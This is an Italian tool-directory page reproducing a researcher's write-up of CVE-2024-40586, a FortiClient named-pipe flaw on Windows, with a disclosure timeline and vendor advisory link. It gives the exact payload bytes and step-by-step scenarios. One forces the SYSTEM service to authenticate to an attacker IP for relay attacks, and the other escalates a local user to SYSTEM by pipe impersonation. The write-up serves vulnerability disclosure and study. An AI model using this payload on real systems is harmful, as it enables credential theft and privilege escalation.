Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-40586-Windows-Coerced-Authentication-in-FortiClient | Kitploit
Strumenti/GitHubGitHub/hagrid29/cve-2024-40586-windows-coerced-authentication-in-forticlient
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitMovimento LateralePenetration TestingAutenticazioneRed Teaming
GitHubhagrid29/cve-2024-40586-windows-coerced-authentication-in-forticlient

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-40586-Windows-Coerced-Authentication-in-FortiClient

Vedi Repository
11 anno faNon ancora revisionato

CVE-2024-40586 Autenticazione Coercita di Windows in FortiClient

Su sistemi Windows, è stato riscontrato che FortiClient (versione app 7.0.8.0427) consente a un utente remoto non privilegiato di forzare gli host Windows ad autenticarsi verso altre macchine tramite una named pipe responsabile del servizio FortiSSLVPNdaemon.

È stato osservato che la named pipe "FortiSslvpnNamedPipe" consente la lettura e la scrittura da parte di qualsiasi utente.

Fig1

Analisi

L'app legge il 5° byte del buffer dalla named pipe come opcode PipeBuffer+4

Fig2

È stato osservato che l'app legge il file se l'opcode è uguale a 24 (cioè 0x18) Flusso del codice: Case 24 => LABEL_26 => strncpy copia il payload nella variabile Buffer => passa il payload a sub_7FF60C3EAC20 => chiama CreateFileA => ReadFile Fig3

Fig4

Fig5

Tuttavia, l'applicazione non fa nulla con il contenuto del file.

Exploit

Possiamo inviare un traffico appositamente creato (cioè "\x00\x00\x00\x00\x18\x00" concatenato con il percorso del target) alla named pipe vulnerabile "FortiSslvpnNamedPipe" per attivare l'opcode 24 e forzare il processo "FortiSSLVPNdaemon.exe" a chiamare CreateFileA con privilegi SYSTEM. Pertanto, possiamo forzare il server a connettersi a un file remoto inviando un percorso UNC (ad es., "\\<ip remoto>\<percorso file>") o a connettersi a una named pipe locale (ad es., "\\127.0.0.1\pipe\<named pipe>")

Scenario 1

Per forzare gli host Windows ad autenticarsi verso altre macchine con un utente remoto non autenticato, l'utente potrebbe seguire questi passaggi:

  1. Sulla macchina dell'attaccante, avviare un listener per ricevere l'autenticazione coercita
  2. Sulla macchina dell'attaccante, inviare il payload appositamente creato (cioè "\x00\x00\x00\x00\x18\x00" + "\\<IP attaccante>\fake\fake") alla named pipe vulnerabile della macchina vittima "\\<IP vittima>\pipe\FortiSslvpnNamedPipe" per forzare il processo a connettersi a un file remoto con percorso UNC "\\<IP attaccante>\fake\fake"
  3. Analogamente ad altri attacchi di coercizione dell'autenticazione (ad es., SpoolSample), l'attaccante potrebbe eseguire un attacco relay o un attacco di downgrade dell'autenticazione

Fig6

Scenario 2

Per eseguire un'elevazione dei privilegi a SYSTEM da un utente locale con "SeImpersonatePrivilege" (ad es., "nt authority\network service"), l'utente potrebbe seguire questi passaggi:

  1. Creare un server di named pipe che attenda la connessione.
  2. Inviare il payload appositamente creato (cioè "\x00\x00\x00\x00\x18\x00" + "\\127.0.0.1\pipe\<server pipe>\XXX") alla named pipe vulnerabile locale "\\.\pipe\FortiSslvpnNamedPipe" per forzare il processo a connettersi al nostro server di named pipe
  3. Dopo che la connessione è stata stabilita, chiamare ImpersonateNamedPipeClient() per impersonare i privilegi SYSTEM.

Fig7

Cronologia

  • 07/09/2023 - Vulnerabilità segnalata a Fortinet
  • 08/30/2023 - Fortinet ha confermato la vulnerabilità
  • 02/11/2024 - Pubblicazione

Riferimenti

  • https://fortiguard.fortinet.com/psirt/FG-IR-23-279
Scarica lo strumento